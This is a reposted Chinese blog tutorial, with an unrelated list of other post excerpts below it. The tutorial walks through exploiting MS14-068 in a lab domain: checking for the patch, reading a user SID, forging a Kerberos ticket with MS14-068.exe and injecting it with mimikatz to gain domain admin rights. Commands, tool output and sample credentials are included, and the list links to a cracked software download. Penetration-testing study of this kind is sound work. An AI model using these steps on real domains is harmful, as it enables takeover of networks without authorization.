当前位置：首页 > 编程日记 > 正文

域渗透提权之MS14-068

编程日记 2024-08-23 21:10:00

0x00 前言

在做渗透测试时，当遇到域环境，获取到一个域成员账号后，如果域控制器未打好补丁，则可以利用本文所提到的漏洞，快速获取到域控制器权限。笔者这里总结网上已有资料，加以描述，希望你能在实际测试中派上用场。

0x01 准备工作

域成员账号及密码一个
mimikatz
ms14-068.exe
03以上服务器或pc

0x02 模拟环境

域控制器 2008r2 dc.test.com 192.168.3.100
域内机器 2008r2 client.test.com 192.168.3.10

0x03 漏洞自检

MS14-068编号CVE-2014-6324，补丁为3011780，如果自检可在域控制器上使用命令检测

systeminfo |find "3011780"

域***提权之MS14-068

为空则代表没有打该补丁，存在漏洞！
如果属于黑盒测试，并没有直接操作域控制器的权限，那么只能使用该漏洞，看是否能成功伪造域管理员登录来验证

0x04 漏洞利用

1. 获取域成员sid

获取域成员sid的方式有多种，当然前提是建立在0x01上，本次使用最为简单的命令获取

whoami /all  #该命令获取当前登录用户的信息，这里使用的是域成员登录，所以获取到的是域成员normal的sid

域***提权之MS14-068

2. 生成TGT票据

使用ms14-068.exe，网上有多种版本，有python脚本（需要在***机上安装python2.x版本，略麻烦），也有已经从python转exe的版本，不需要依赖python环境，下载地址：https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

C:\Users\normal\Desktop>MS14-068.exe
USAGE:
MS14-068.exe -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>OPTIONS:-p <clearPassword>--rc4 <ntlmHash>C:\Users\normal\Desktop>MS14-068.exe -u normal@test.com -s S-1-5-21-1406004368-3
818689962-3591297438-1105 -d 192.168.3.100 -p Server1[+] Building AS-REQ for 192.168.3.100... Done![+] Sending AS-REQ to 192.168.3.100... Done![+] Receiving AS-REP from 192.168.3.100... Done![+] Parsing AS-REP from 192.168.3.100... Done![+] Building TGS-REQ for 192.168.3.100... Done![+] Sending TGS-REQ to 192.168.3.100... Done![+] Receiving TGS-REP from 192.168.3.100... Done![+] Parsing TGS-REP from 192.168.3.100... Done![+] Creating ccache file 'TGT_normal@test.com.ccache'... Done!使用方法：
ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码

如果操作正确，且域机器是可以和域控制器互通则会创建.ccache文件
域***提权之MS14-068
域成员密码错误情况图

3. 票据注入

使用mimikatz将票据注入到当前内存中，伪造凭证，如果成功则拥有域管理权限，可任意访问域中所有机器

mimikatz # kerberos::purge      //清空当前机器中所有凭证，如果有域成员凭证会影响凭证伪造
mimikatz # kerberos::list          //查看当前机器凭证
mimikatz # kerberos::ptc 票据文件         //将票据注入到内存中

域***提权之MS14-068
当显示injecting ticket ok时，表示已经成功将票据注入到内存中，可在机器中用klist查看

4.测试

伪造后，进行尝试访问域控制器
域***提权之MS14-068

注入票据前是不能访问的
域***提权之MS14-068

0x05 细节

注入票据时，机器不能是03或xp，因为mimikatz不支持这两个机器注入，听大佬说过有工具可以注入，希望有知道的朋友可以留言
当获取到域用户、域用户sid、密码以及可访问到域控制器的机器，并不需要机器一定在域中（如***者通过***等拨入内网），但需要把dns指向域控制器才能解析
访问域控制器时，需要使用主机名，不能使用ip
如有错误，请指正，万分感谢

转发：https://blog.51cto.com/z2ppp/2060051

https://www.dkcj.cn/info/15572.html

iOS 高可控性日历基础组件 - SKCalendarView 的使用和实现思路的分享

阅读 61收藏 52017-04-02原文链接：http://www.jianshu.com/p/ce4c64a4d437SKCalendarView 是一个高可控性的日历基础组件，为了提高应用的自由度，默认只提供了日历部分的视图封装，但不涵盖切换月份按钮、年月分显示等非关键性控件&…

编程日记2024/08/23 21:00:00

懒加载字典转模型自定义cell

1 懒加载: 1> 什么是懒加载? 懒加载又称为延时加载,即在系统调用的时候加载,如果系统不调用则不会加载.所谓的懒加载其实就是重写其 get 方法. 2> 特点:在使用懒加载的时候要先判断该方法是否已经存在,如果不存在则再进行实例化. 3> 优点: 不必将创建对象的方法都…

编程日记2024/08/23 20:50:00

合计函数 (比如 SUM) 常常需要添加 GROUP BY 语句。 GROUP BY 语句 GROUP BY 语句用于结合合计函数，根据一个或多个列对结果集进行分组。 SQL GROUP BY 语法 SELECT column_name, aggregate_function(column_name) FROM table_name WHERE column_name operator valu…

编程日记2024/08/23 20:40:00

docker如何push镜像到docker hub个人的仓库

docker如何push镜像到docker hub个人的仓库 step1——找到本地镜像的ID：docker imagesstep2——登陆Hub：docker login --usernameusername --passwordpassword --emailemailstep3——tag：docker tag <imageID> <namespace>/<…

编程日记2024/08/23 20:30:00

博客开通第一天，加油

博客开通第一天，加油转载于:https://www.cnblogs.com/tianyang01/p/5499881.html

编程日记2024/08/23 20:20:00

【iOS 开发】iOS 10.3 如何更换 app 图标

2017-04-06 KyrieXu Cocoa开发者社区iOS 10.3 开放了更换 app 图标的 API，核心方法是下面这个： func setAlternateIconName(_ alternateIconName: String?, completionHandler: ((Error?) -> Void)? nil) 这是官方文档，但是你还需要在…

编程日记2024/08/23 20:10:00

WordPress qTranslate插件跨站请求伪造漏洞

漏洞名称：WordPress qTranslate插件跨站请求伪造漏洞CNNVD编号：CNNVD-201306-058发布时间：2013-06-07更新时间：2013-06-07危害等级： 漏洞类型：跨站请求伪造威胁类型：远程CVE编号：CV…

编程日记2024/08/23 20:00:00

ESXi6.5环境搭建（一：VMware Workstations 12 Pro 环境的安装及配置）

实验目的及要求完成VMware workstations安装，会应用相关操作；完成虚拟机中ESXI6.5平台的安装及网络环境配置；完成VMware vSphere Client 6.0软件在PC端的安装及配置；完成使用浏览器或者VMware vSphere Client 6.0中对ESXI6.5的操…

编程日记2024/08/23 19:50:00

[vs2008]Visual Studio 2008 SP1添加或删除功能提示查找SQLSysClrTypes.msi文件

前言今天接到领导布置的一个任务，是之前同事负责的项目。离职了，现在客户有些地方需要修改，由于我之前参与过，就落在我的头上了。然后我就把代码弄了过来，打开发现其中需要用到水晶报表。（我觉得不好用&a…

编程日记2024/08/23 19:40:00

iOS10.3 的评论系统

作者 xuyafei86 关注 2017.03.30 12:39* 字数 428 阅读 265评论 4喜欢 11iOS10.3 对 App 的评论系统进行了较大的升级。主要在三个方面。支持 App 内评分在此之前我们要实现 App 内评分需要使用 SKStoreProductViewController。它只会在 App 内部模态打开在 AppStore 的详情页…

编程日记2024/08/23 19:30:00

windows 内存泄露和资源泄漏调试

AQTime (有x64、win32的)进行内存泄露和资源泄漏监控http://wenku.baidu.com/view/9aa1c2afdd3383c4bb4cd2c1.html x64下载：http://downlite.net/lp.php?coc&nAutomatedQA.AQTime.v6.21.400.x64.Cracked.WORKING-BRD Windows Leaks Detector（好象只…

编程日记2024/08/23 19:20:00

ESXi6.5环境搭建（二：ESXi 6.5环境的安装及配置）

编程日记2024/08/23 19:10:00

Android自定义ListView的Item无法响应OnItemClick的解决办法

转：如果你的自定义ListViewItem中有Button或者Checkable的子类控件的话，那么默认focus是交给了子控件，而ListView的Item能被选中的基础是它能获取Focus，也就是说我们可以通过将ListView中Item中包含的所有控件的focusable属性设置…

编程日记2024/08/23 19:00:00

iPA 打包小工具

2017-04-07原文链接：http://icofans.com/2017/04/06/%E6%A1%8C%E9%9D%A2%E6%89%93%E5%8C%85IPA%E5%B0%8F%E7%A8%8B%E5%BA%8F/对项目进行 iPA 打包导出使用方法：运行后，将项目文件夹拖拽至主界面，此时项目便开始打包。打包完成后会…

编程日记2024/08/23 18:50:00

ESXi6.5环境搭建（三：vSphere Client6.0安装）

编程日记2024/08/23 18:40:00

JavaScript arguments对象

1、在JavaScript中，arguments对象是比较特别的一个对象，实际上是当前函数的一个内置属性。arguments非常类似Array，但实际上又不是一个Array实例。可以通过如下代码得以证实（当然，实际上，在函数funcArg中&a…

编程日记2024/08/23 18:30:00

iOS开发之 - 好玩的富文本

周末闲着没事，就想着不如把那些容易遗忘的知识点整理一下，一来可以让有需要的朋友少走弯路，二来自己以后再忘记的时候也可以回头看看......但 iOS 中小冷易忘的知识点实在太多了，不知道该从哪里开始整理，“百无聊赖”逛…

编程日记2024/08/23 18:20:00

sharepoint自带JS函数获取URL参数

GetUrlKeyValue 转载于:https://www.cnblogs.com/bmib/p/3139749.html

编程日记2024/08/23 18:10:00

ESXi6.5环境搭建（四：虚拟机操作系统安装及配置）

编程日记2024/08/23 18:00:01

iOS 生成带 logo 的二维码，区域截屏保存至相册（小功能二连发 (一)）

原文链接：http://www.jianshu.com/p/36e9f012ef39生成带 logo 的二维码区域截屏相关 —— 由3033分享开篇最近项目需要搞了几个相对独立的小功能，今天有空总结一下他们的实现思路和方法，并总结一点项目中帮同事解决的问题，在此立…

编程日记2024/08/23 17:50:00

JavaScript-学习一全局变量

因为局部变量只作用于函数内，所以不同的函数可以使用相同名称的变量。局部变量在函数开始执行时创建，函数执行完后局部变量会自动销不限制位置的 JavaScript 变量生命周期在它声明时初始化。局部变量在函数执行完毕后销毁。全局变量在页面关闭后销毁…

编程日记2024/08/23 17:40:00

Android 4.2真坑爹

艹~~~，Android4.2真坑爹，4.1以前的方法都不能使用了。操蛋呢。。。转载于:https://www.cnblogs.com/liushuibufu/p/3253611.html

编程日记2024/08/23 17:30:00

ESXi6.5环境搭建（五：常见问题及解决方案实验总结）

编程日记2024/08/23 17:20:00

《Linux4.0设备驱动开发详解》笔记--第十二章：Linux设备驱动的软件架构思想

待补充转载于:https://www.cnblogs.com/zcjboke/p/5513130.html

编程日记2024/08/23 17:10:00

iOS_Development~ 添加 / 隐藏 UITabBar 右上角的小红点

原文链接：http://www.jianshu.com/p/de72118a49ad添加 / 隐藏 UITabBar 右上角的小红点 —— 由anticipate_91分享添加/隐藏UITabBar右上角的小红点话不多说，直接上代码吧！ 1.添加tabBar的小红点 /** 添加tabBar的小红点* index&#xff1…

编程日记2024/08/23 17:00:00

解决ubuntu上opengl的问题

装完ubuntu之后，对于opengl的程序总是出现问题，先将解决方案列出如下： http://www.linuxforums.org/forum/ubuntu-linux/175490-graphics-driver-problem.html http://superuser.com/questions/484991/nvidia-graphics-driver-in-ubuntu-12-0…

编程日记2024/08/23 16:50:00

OpenStack环境搭建（一：Virtual Box 5.1 环境的安装及配置）

实验要求： 完成Virtual box平台安装，会应用相关操作；在virtual box虚拟平台上部署Fuel Master节点；在virtual box虚拟平台上部署计算节点Computer；在virtual box虚拟平台上部署控制节点Controller；在web控…

编程日记2024/08/23 16:40:00

[转载]SSH框架搭建详细图文教程

什么是SSH? SSH对应 struts spring hibernatestruts 采用MVC模式，主要是作用于用户交互spring 采用IOC和AOP~作用比较抽象，是用于项目的松耦合hibernate 是对象持久化框架，其实就是实体类和数据库表建立关系，操作类就会触发相应的…

编程日记2024/08/23 16:30:00

iOS 开发之 pdf 文档的加载与浏览的 4 种方式

原文链接：http://www.jianshu.com/p/1d4305a02ea5在我们的开发中，有些像电子书类型的 app 的开发会涉及到 pdf 文档的加载与展示。由于笔者项目中正好涉及到这块，于是将 pdf 常用的几种加载方式做个总结。以供后面可能用到的同学做个参考。 —…

编程日记2024/08/23 16:20:00

利用三个点（trsf）来实现各种规则图形的实现

在Val3,是使用trsf(x,y,z,rx,ry,rz)来实现三维空间点的位置与方向。其中第一点和第二点位置很重要，第三点是用来确定方向。根据这三个点先确定一个用户坐标系。在这个坐标系中，实现圆，三角形，矩形，腰圆，正五…

编程日记2024/08/23 16:10:00